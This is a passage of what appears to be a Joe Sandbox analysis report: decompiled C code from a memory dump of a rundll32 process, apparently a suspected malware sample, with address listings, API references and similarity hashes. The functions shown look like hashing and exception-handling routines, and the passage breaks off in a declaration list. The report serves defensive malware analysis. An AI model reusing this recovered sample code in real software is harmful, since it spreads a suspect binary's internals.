                                				asm("rol edx, 0xe");
                                				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                				asm("ror esi, 0xc");
                                				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                				asm("rol eax, 0x4");
                                				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                				asm("rol ecx, 0xb");
                                				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                				asm("rol edx, 0x10");
                                				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                				_t599 = _t367 ^ _t420;
                                				asm("ror esi, 0x9");
                                				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                				asm("rol eax, 0x4");
                                				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                				asm("rol edi, 0xb");
                                				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                				asm("rol edx, 0x10");
                                				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                				_t338 = _t607 ^ _t422;
                                				asm("ror ecx, 0x9");
                                				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                				asm("rol eax, 0x4");
                                				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                				asm("rol esi, 0xb");
                                				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                				asm("rol edi, 0x10");
                                				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                				_t424 = _t734 ^ _t613;
                                				asm("ror ecx, 0x9");
                                				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                				asm("rol eax, 0x4");
                                				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                				asm("rol edx, 0xb");
                                				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                				asm("rol esi, 0x10");
                                				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                				asm("ror ecx, 0x9");
                                				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                				asm("rol eax, 0x6");
                                				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                				asm("rol edx, 0xa");
                                				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                				asm("rol esi, 0xf");
                                				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                				asm("ror ecx, 0xb");
                                				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                				asm("rol eax, 0x6");
                                				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                				asm("rol edx, 0xa");
                                				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                				asm("rol esi, 0xf");
                                				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                				asm("ror ecx, 0xb");
                                				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                				asm("rol eax, 0x6");
                                				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                				asm("rol edx, 0xa");
                                				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                				asm("rol esi, 0xf");
                                				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                				asm("ror edi, 0xb");
                                				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                				asm("rol eax, 0x6");
                                				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                				asm("rol edx, 0xa");
                                				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                				_t400 = _a4;
                                				asm("rol esi, 0xf");
                                				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                				 *_t400 =  *_t400 + _t259;
                                				asm("ror eax, 0xb");
                                				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                				return memset( &_v76, 0, 0x40);
                                			}


































































































                                0x01064bf4
                                0x01064bff
                                0x01064c02
                                0x01064c05
                                0x01064c06
                                0x01064c24
                                0x01064c26
                                0x01064c29
                                0x01064c2c
                                0x01064c2c
                                0x01064c2f
                                0x01064c2f
                                0x01064c32
                                0x01064c32
                                0x01064c35
                                0x01064c35
                                0x01064c52
                                0x01064c55
                                0x01064c6b
                                0x01064c6e
                                0x01064c88
                                0x01064c8b
                                0x01064ca1
                                0x01064ca4
                                0x01064ca6
                                0x01064cbe
                                0x01064cc1
                                0x01064cc4
                                0x01064cdc
                                0x01064cdf
                                0x01064cf9
                                0x01064cfc
                                0x01064d12
                                0x01064d15
                                0x01064d17
                                0x01064d2f
                                0x01064d34
                                0x01064d37
                                0x01064d4d
                                0x01064d50
                                0x01064d6a
                                0x01064d6d
                                0x01064d83
                                0x01064d86
                                0x01064d88
                                0x01064da3
                                0x01064da6
                                0x01064dbd
                                0x01064dc0
                                0x01064dc4
                                0x01064ddd
                                0x01064de0
                                0x01064de2
                                0x01064de5
                                0x01064e00
                                0x01064e03
                                0x01064e1c
                                0x01064e1f
                                0x01064e2f
                                0x01064e32
                                0x01064e4a
                                0x01064e4d
                                0x01064e67
                                0x01064e6a
                                0x01064e82
                                0x01064e85
                                0x01064e9b
                                0x01064e9e
                                0x01064eb6
                                0x01064eb9
                                0x01064ed1
                                0x01064ed4
                                0x01064eee
                                0x01064ef1
                                0x01064f07
                                0x01064f0a
                                0x01064f22
                                0x01064f25
                                0x01064f3f
                                0x01064f42
                                0x01064f5a
                                0x01064f5d
                                0x01064f73
                                0x01064f76
                                0x01064f8e
                                0x01064f91
                                0x01064fa9
                                0x01064fac
                                0x01064fbe
                                0x01064fc1
                                0x01064fd3
                                0x01064fd6
                                0x01064fe8
                                0x01064feb
                                0x01064fef
                                0x01064fff
                                0x01065002
                                0x01065010
                                0x01065013
                                0x01065025
                                0x01065028
                                0x0106503c
                                0x0106503f
                                0x01065041
                                0x01065051
                                0x01065054
                                0x01065066
                                0x01065069
                                0x01065077
                                0x0106507a
                                0x0106508c
                                0x0106508f
                                0x01065093
                                0x010650a3
                                0x010650a6
                                0x010650b8
                                0x010650bb
                                0x010650c9
                                0x010650cc
                                0x010650de
                                0x010650e1
                                0x010650f3
                                0x010650f6
                                0x0106510a
                                0x0106510d
                                0x01065121
                                0x01065124
                                0x01065138
                                0x0106513b
                                0x0106514f
                                0x01065152
                                0x01065166
                                0x01065169
                                0x0106517d
                                0x01065182
                                0x01065194
                                0x01065197
                                0x010651ab
                                0x010651ae
                                0x010651c2
                                0x010651c5
                                0x010651db
                                0x010651de
                                0x010651f2
                                0x010651f5
                                0x01065207
                                0x0106520a
                                0x0106521e
                                0x01065221
                                0x01065235
                                0x01065238
                                0x0106524c
                                0x01065255
                                0x01065258
                                0x01065261
                                0x0106526a
                                0x01065272
                                0x0106527a
                                0x01065284
                                0x01065299

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                • Instruction ID: f827df7523243f8c95d09e7df68682723d4aaaa31e8f339ad1464906f5910c3c
                                • Opcode Fuzzy Hash: b84fae2424a8dea2ca03a1429469610375b5738a21d8790c4dd2bcffc4a620be
                                • Instruction Fuzzy Hash: 3E22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E010684C1(long _a4) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				short* _v32;
                                				void _v36;
                                				void* _t57;
                                				signed int _t58;
                                				signed int _t61;
                                				signed int _t62;
                                				void* _t63;
                                				signed int* _t68;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr _t72;
                                				intOrPtr _t75;
                                				void* _t76;
                                				signed int _t77;
                                				void* _t78;
                                				void _t80;
                                				signed int _t81;
                                				signed int _t84;
                                				signed int _t86;
                                				short* _t87;
                                				void* _t89;
                                				signed int* _t90;
                                				long _t91;
                                				signed int _t93;
                                				signed int _t94;
                                				signed int _t100;
                                				signed int _t102;
                                				void* _t104;
                                				long _t108;
                                				signed int _t110;
                                
                                				_t108 = _a4;
                                				_t76 =  *(_t108 + 8);
                                				if((_t76 & 0x00000003) != 0) {
                                					L3:
                                					return 0;
                                				}
                                				_a4 =  *[fs:0x4];
                                				_v8 =  *[fs:0x8];
                                				if(_t76 < _v8 || _t76 >= _a4) {
                                					_t102 =  *(_t108 + 0xc);
                                					__eflags = _t102 - 0xffffffff;
                                					if(_t102 != 0xffffffff) {
                                						_t91 = 0;
                                						__eflags = 0;
                                						_a4 = 0;
                                						_t57 = _t76;
                                						do {
                                							_t80 =  *_t57;
                                							__eflags = _t80 - 0xffffffff;
                                							if(_t80 == 0xffffffff) {
                                								goto L9;
                                							}
                                							__eflags = _t80 - _t91;
                                							if(_t80 >= _t91) {
                                								L20:
                                								_t63 = 0;
                                								L60:
                                								return _t63;
                                							}
                                							L9:
                                							__eflags =  *(_t57 + 4);
                                							if( *(_t57 + 4) != 0) {
                                								_t12 =  &_a4;
                                								 *_t12 = _a4 + 1;
                                								__eflags =  *_t12;
                                							}
                                							_t91 = _t91 + 1;
                                							_t57 = _t57 + 0xc;
                                							__eflags = _t91 - _t102;
                                						} while (_t91 <= _t102);
                                						__eflags = _a4;
                                						if(_a4 == 0) {
                                							L15:
                                							_t81 =  *0x106a380; // 0x0
                                							_t110 = _t76 & 0xfffff000;
                                							_t58 = 0;
                                							__eflags = _t81;
                                							if(_t81 <= 0) {
                                								L18:
                                								_t104 = _t102 | 0xffffffff;
                                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                								__eflags = _t61;
                                								if(_t61 < 0) {
                                									_t62 = 0;
                                									__eflags = 0;
                                								} else {
                                									_t62 = _a4;
                                								}
                                								__eflags = _t62;
                                								if(_t62 == 0) {
                                									L59:
                                									_t63 = _t104;
                                									goto L60;
                                								} else {
                                									__eflags = _v12 - 0x1000000;
                                									if(_v12 != 0x1000000) {
                                										goto L59;
                                									}
                                									__eflags = _v16 & 0x000000cc;
                                									if((_v16 & 0x000000cc) == 0) {
                                										L46:
                                										_t63 = 1;
                                										 *0x106a3c8 = 1;
                                										__eflags =  *0x106a3c8;
                                										if( *0x106a3c8 != 0) {
                                											goto L60;
                                										}
                                										_t84 =  *0x106a380; // 0x0
                                										__eflags = _t84;
                                										_t93 = _t84;
                                										if(_t84 <= 0) {
                                											L51:
                                											__eflags = _t93;
                                											if(_t93 != 0) {
                                												L58:
                                												 *0x106a3c8 = 0;
                                												goto L5;
                                											}
                                											_t77 = 0xf;
                                											__eflags = _t84 - _t77;
                                											if(_t84 <= _t77) {
                                												_t77 = _t84;
                                											}
                                											_t94 = 0;
                                											__eflags = _t77;
                                											if(_t77 < 0) {
                                												L56:
                                												__eflags = _t84 - 0x10;
                                												if(_t84 < 0x10) {
                                													_t86 = _t84 + 1;
                                													__eflags = _t86;
                                													 *0x106a380 = _t86;
                                												}
                                												goto L58;
                                											} else {
                                												do {
                                													_t68 = 0x106a388 + _t94 * 4;
                                													_t94 = _t94 + 1;
                                													__eflags = _t94 - _t77;
                                													 *_t68 = _t110;
                                													_t110 =  *_t68;
                                												} while (_t94 <= _t77);
                                												goto L56;
                                											}
                                										}
                                										_t69 = 0x106a384 + _t84 * 4;
                                										while(1) {
                                											__eflags =  *_t69 - _t110;
                                											if( *_t69 == _t110) {
                                												goto L51;
                                											}
                                											_t93 = _t93 - 1;
                                											_t69 = _t69 - 4;
                                											__eflags = _t93;
                                											if(_t93 > 0) {
                                												continue;
                                											}
                                											goto L51;
                                										}
                                										goto L51;
                                									}
                                									_t87 = _v32;
                                									__eflags =  *_t87 - 0x5a4d;
                                									if( *_t87 != 0x5a4d) {
                                										goto L59;
                                									}
                                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                									__eflags =  *_t71 - 0x4550;
                                									if( *_t71 != 0x4550) {
                                										goto L59;
                                									}
                                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                										goto L59;
                                									}
                                									_t78 = _t76 - _t87;
                                									__eflags =  *((short*)(_t71 + 6));
                                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                									if( *((short*)(_t71 + 6)) <= 0) {
                                										goto L59;
                                									}
                                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                									__eflags = _t78 - _t72;
                                									if(_t78 < _t72) {
                                										goto L46;
                                									}
                                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                										goto L46;
                                									}
                                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                										goto L20;
                                									}
                                									goto L46;
                                								}
                                							} else {
                                								goto L16;
                                							}
                                							while(1) {
                                								L16:
                                								__eflags =  *((intOrPtr*)(0x106a388 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0x106a388 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 + 1;
                                								__eflags = _t58 - _t81;
                                								if(_t58 < _t81) {
                                									continue;
                                								}
                                								goto L18;
                                							}
                                							__eflags = _t58;
                                							if(_t58 <= 0) {
                                								goto L5;
                                							}
                                							 *0x106a3c8 = 1;
                                							__eflags =  *0x106a3c8;
                                							if( *0x106a3c8 != 0) {
                                								goto L5;
                                							}
                                							__eflags =  *((intOrPtr*)(0x106a388 + _t58 * 4)) - _t110;
                                							if( *((intOrPtr*)(0x106a388 + _t58 * 4)) == _t110) {
                                								L32:
                                								_t100 = 0;
                                								__eflags = _t58;
                                								if(_t58 < 0) {
                                									L34:
                                									 *0x106a3c8 = 0;
                                									goto L5;
                                								} else {
                                									goto L33;
                                								}
                                								do {
                                									L33:
                                									_t90 = 0x106a388 + _t100 * 4;
                                									_t100 = _t100 + 1;
                                									__eflags = _t100 - _t58;
                                									 *_t90 = _t110;
                                									_t110 =  *_t90;
                                								} while (_t100 <= _t58);
                                								goto L34;
                                							}
                                							_t25 = _t81 - 1; // -1
                                							_t58 = _t25;
                                							__eflags = _t58;
                                							if(_t58 < 0) {
                                								L28:
                                								__eflags = _t81 - 0x10;
                                								if(_t81 < 0x10) {
                                									_t81 = _t81 + 1;
                                									__eflags = _t81;
                                									 *0x106a380 = _t81;
                                								}
                                								_t28 = _t81 - 1; // 0x0
                                								_t58 = _t28;
                                								goto L32;
                                							} else {
                                								goto L25;
                                							}
                                							while(1) {
                                								L25:
                                								__eflags =  *((intOrPtr*)(0x106a388 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0x106a388 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 - 1;
                                								__eflags = _t58;
                                								if(_t58 >= 0) {
                                									continue;
                                								}
                                								break;
                                							}
                                							__eflags = _t58;
                                							if(__eflags >= 0) {
                                								if(__eflags == 0) {
                                									goto L34;
                                								}
                                								goto L32;
                                							}
                                							goto L28;
                                						}
                                						_t75 =  *((intOrPtr*)(_t108 - 8));
                                						__eflags = _t75 - _v8;
                                						if(_t75 < _v8) {
                                							goto L20;
                                						}
                                						__eflags = _t75 - _t108;
                                						if(_t75 >= _t108) {
                                							goto L20;
                                						}
                                						goto L15;
                                					}
                                					L5:
                                					_t63 = 1;
                                					goto L60;
                                				} else {
                                					goto L3;
                                				}
                                			}




































                                0x010684cb
                                0x010684ce
                                0x010684d4
                                0x010684f2
                                0x00000000
                                0x010684f2
                                0x010684dc
                                0x010684e5
                                0x010684eb
                                0x010684fa
                                0x010684fd
                                0x01068500
                                0x0106850a
                                0x0106850a
                                0x0106850c
                                0x0106850f
                                0x01068511
                                0x01068511
                                0x01068513
                                0x01068516
                                0x00000000
                                0x00000000
                                0x01068518
                                0x0106851a
                                0x01068580
                                0x01068580
                                0x010686de
                                0x00000000
                                0x010686de
                                0x0106851c
                                0x0106851c
                                0x01068520
                                0x01068522
                                0x01068522
                                0x01068522
                                0x01068522
                                0x01068525
                                0x01068526
                                0x01068529
                                0x01068529
                                0x0106852d
                                0x01068531
                                0x0106853f
                                0x0106853f
                                0x01068547
                                0x0106854d
                                0x0106854f
                                0x01068551
                                0x01068561
                                0x0106856e
                                0x01068572
                                0x01068577
                                0x01068579
                                0x010685f7
                                0x010685f7
                                0x0106857b
                                0x0106857b
                                0x0106857b
                                0x010685f9
                                0x010685fb
                                0x010686dc
                                0x010686dc
                                0x00000000
                                0x01068601
                                0x01068601
                                0x01068608
                                0x00000000
                                0x00000000
                                0x0106860e
                                0x01068612
                                0x0106866e
                                0x01068670
                                0x01068678
                                0x0106867a
                                0x0106867c
                                0x00000000
                                0x00000000
                                0x0106867e
                                0x01068684
                                0x01068686
                                0x01068688
                                0x0106869d
                                0x0106869d
                                0x0106869f
                                0x010686ce
                                0x010686d5
                                0x00000000
                                0x010686d5
                                0x010686a3
                                0x010686a4
                                0x010686a6
                                0x010686a8
                                0x010686a8
                                0x010686aa
                                0x010686ac
                                0x010686ae
                                0x010686c2
                                0x010686c2
                                0x010686c5
                                0x010686c7
                                0x010686c7
                                0x010686c8
                                0x010686c8
                                0x00000000
                                0x010686b0
                                0x010686b0
                                0x010686b0
                                0x010686b9
                                0x010686ba
                                0x010686bc
                                0x010686be
                                0x010686be
                                0x00000000
                                0x010686b0
                                0x010686ae
                                0x0106868a
                                0x01068691
                                0x01068691
                                0x01068693
                                0x00000000
                                0x00000000
                                0x01068695
                                0x01068696
                                0x01068699
                                0x0106869b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0106869b
                                0x00000000
                                0x01068691
                                0x01068614
                                0x01068617
                                0x0106861c
                                0x00000000
                                0x00000000
                                0x01068625
                                0x01068627
                                0x0106862d
                                0x00000000
                                0x00000000
                                0x01068633
                                0x01068639
                                0x00000000
                                0x00000000
                                0x0106863f
                                0x01068641
                                0x0106864a
                                0x0106864e
                                0x00000000
                                0x00000000
                                0x01068654
                                0x01068657
                                0x01068659
                                0x00000000
                                0x00000000
                                0x01068660
                                0x01068662
                                0x00000000
                                0x00000000
                                0x01068664
                                0x01068668
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01068668
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01068553
                                0x01068553
                                0x01068553
                                0x0106855a
                                0x00000000
                                0x00000000
                                0x0106855c
                                0x0106855d
                                0x0106855f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0106855f
                                0x01068587
                                0x01068589
                                0x00000000
                                0x00000000
                                0x01068599
                                0x0106859b
                                0x0106859d
                                0x00000000
                                0x00000000
                                0x010685a3
                                0x010685aa
                                0x010685d6
                                0x010685d6
                                0x010685d8
                                0x010685da
                                0x010685ee
                                0x010685f0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x010685dc
                                0x010685dc
                                0x010685dc
                                0x010685e5
                                0x010685e6
                                0x010685e8
                                0x010685ea
                                0x010685ea
                                0x00000000
                                0x010685dc
                                0x010685ac
                                0x010685ac
                                0x010685af
                                0x010685b1
                                0x010685c3
                                0x010685c3
                                0x010685c6
                                0x010685c8
                                0x010685c8
                                0x010685c9
                                0x010685c9
                                0x010685cf
                                0x010685cf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x010685b3
                                0x010685b3
                                0x010685b3
                                0x010685ba
                                0x00000000
                                0x00000000
                                0x010685bc
                                0x010685bc
                                0x010685bd
                                0x00000000
                                0x00000000
                                0x00000000
                                0x010685bd
                                0x010685bf
                                0x010685c1
                                0x010685d4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x010685d4
                                0x00000000
                                0x010685c1
                                0x01068533
                                0x01068536
                                0x01068539
                                0x00000000
                                0x00000000
                                0x0106853b
                                0x0106853d
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0106853d
                                0x01068502
                                0x01068504
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 01068572
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: dc06c96592720bb41a4f900898c2759a8dc2f43a9a9cffdac55594ed4479614b
                                • Instruction ID: ebc43ac5bedef8faabb2e825fa24e44f5bbc7323c7b8827320fac63100e8bde4
                                • Opcode Fuzzy Hash: dc06c96592720bb41a4f900898c2759a8dc2f43a9a9cffdac55594ed4479614b
                                • Instruction Fuzzy Hash: 9961C1707007168FDB6ACE2CC89066977E9BB89354B28C0ABF9C6D7299E775DC428740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 71%
                                			E0106829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                				intOrPtr _v8;
                                				char _v12;
                                				void* __ebp;
                                				signed int* _t43;
                                				char _t44;
                                				void* _t46;
                                				void* _t49;
                                				intOrPtr* _t53;
                                				void* _t54;
                                				void* _t65;
                                				long _t66;
                                				signed int* _t80;
                                				signed int* _t82;
                                				void* _t84;
                                				signed int _t86;
                                				void* _t89;
                                				void* _t95;
                                				void* _t96;
                                				void* _t99;
                                				void* _t106;
                                
                                				_t43 = _t84;
                                				_t65 = __ebx + 2;
                                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                				_t89 = _t95;
                                				_t96 = _t95 - 8;
                                				_push(_t65);
                                				_push(_t84);
                                				_push(_t89);
                                				asm("cld");
                                				_t66 = _a8;
                                				_t44 = _a4;
                                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                					_push(_t89);
                                					E01068407(_t66 + 0x10, _t66, 0xffffffff);
                                					_t46 = 1;
                                				} else {
                                					_v12 = _t44;
                                					_v8 = _a12;
                                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                					_t86 =  *(_t66 + 0xc);
                                					_t80 =  *(_t66 + 8);
                                					_t49 = E010684C1(_t66);
                                					_t99 = _t96 + 4;
                                					if(_t49 == 0) {
                                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                						goto L11;
                                					} else {
                                						while(_t86 != 0xffffffff) {
                                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                							if(_t53 == 0) {
                                								L8:
                                								_t80 =  *(_t66 + 8);
                                								_t86 = _t80[_t86 + _t86 * 2];
                                								continue;
                                							} else {
                                								_t54 =  *_t53();
                                								_t89 = _t89;
                                								_t86 = _t86;
                                								_t66 = _a8;
                                								_t55 = _t54;
                                								_t106 = _t54;
                                								if(_t106 == 0) {
                                									goto L8;
                                								} else {
                                									if(_t106 < 0) {
                                										_t46 = 0;
                                									} else {
                                										_t82 =  *(_t66 + 8);
                                										E010683AC(_t55, _t66);
                                										_t89 = _t66 + 0x10;
                                										E01068407(_t89, _t66, 0);
                                										_t99 = _t99 + 0xc;
                                										E010684A3(_t82[2]);
                                										 *(_t66 + 0xc) =  *_t82;
                                										_t66 = 0;
                                										_t86 = 0;
                                										 *(_t82[2])(1);
                                										goto L8;
                                									}
                                								}
                                							}
                                							goto L13;
                                						}
                                						L11:
                                						_t46 = 1;
                                					}
                                				}
                                				L13:
                                				return _t46;
                                			}























                                0x010682a0
                                0x010682a1
                                0x010682a2
                                0x010682a5
                                0x010682a7
                                0x010682aa
                                0x010682ab
                                0x010682ad
                                0x010682ae
                                0x010682af
                                0x010682b2
                                0x010682bc
                                0x0106836d
                                0x01068374
                                0x0106837d
                                0x010682c2
                                0x010682c2
                                0x010682c8
                                0x010682ce
                                0x010682d1
                                0x010682d4
                                0x010682d8
                                0x010682dd
                                0x010682e2
                                0x01068362
                                0x00000000
                                0x010682e4
                                0x010682e4
                                0x010682f0
                                0x010682f2
                                0x0106834d
                                0x0106834d
                                0x01068353
                                0x00000000
                                0x010682f4
                                0x01068303
                                0x01068305
                                0x01068306
                                0x01068307
                                0x0106830a
                                0x0106830a
                                0x0106830c
                                0x00000000
                                0x0106830e
                                0x0106830e
                                0x01068358
                                0x01068310
                                0x01068310
                                0x01068314
                                0x0106831c
                                0x01068321
                                0x01068326
                                0x01068332
                                0x0106833a
                                0x01068341
                                0x01068347
                                0x0106834b
                                0x00000000
                                0x0106834b
                                0x0106830e
                                0x0106830c
                                0x00000000
                                0x010682f2
                                0x01068366
                                0x01068366
                                0x01068366
                                0x010682e2
                                0x01068382
                                0x01068389

                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction ID: 560edfda728ccdfb701fb17980e391e50f621131465566ef9c95dd91a4dd421e
                                • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                • Instruction Fuzzy Hash: E121D672900315AFDB14DF68C8809ABBBA9FF44310B09C5AAD9999B255EB30F915C7E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E0106300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                                				intOrPtr _v4;
                                				signed int _v8;
                                				int* _v12;
                                				char* _v16;
                                				intOrPtr _v20;
                                				void* _v24;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				void* _v40;
                                				void* __ebx;
                                				void* __edi;
                                				long _t66;
                                				intOrPtr _t67;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t70;
                                				intOrPtr _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				int _t78;
                                				intOrPtr _t79;
                                				int _t82;
                                				intOrPtr _t83;
                                				intOrPtr _t84;
                                				void* _t86;
                                				void* _t89;
                                				intOrPtr _t93;
                                				intOrPtr _t97;
                                				intOrPtr* _t99;
                                				int* _t105;
                                				int* _t115;
                                				char** _t117;
                                				char* _t118;
                                				intOrPtr* _t123;
                                				intOrPtr* _t125;
                                				intOrPtr* _t127;
                                				intOrPtr* _t129;
                                				intOrPtr _t132;
                                				intOrPtr _t136;
                                				int _t139;
                                				intOrPtr _t141;
                                				int _t144;
                                				void* _t145;
                                				intOrPtr _t159;
                                				void* _t161;
                                				int _t162;
                                				void* _t163;
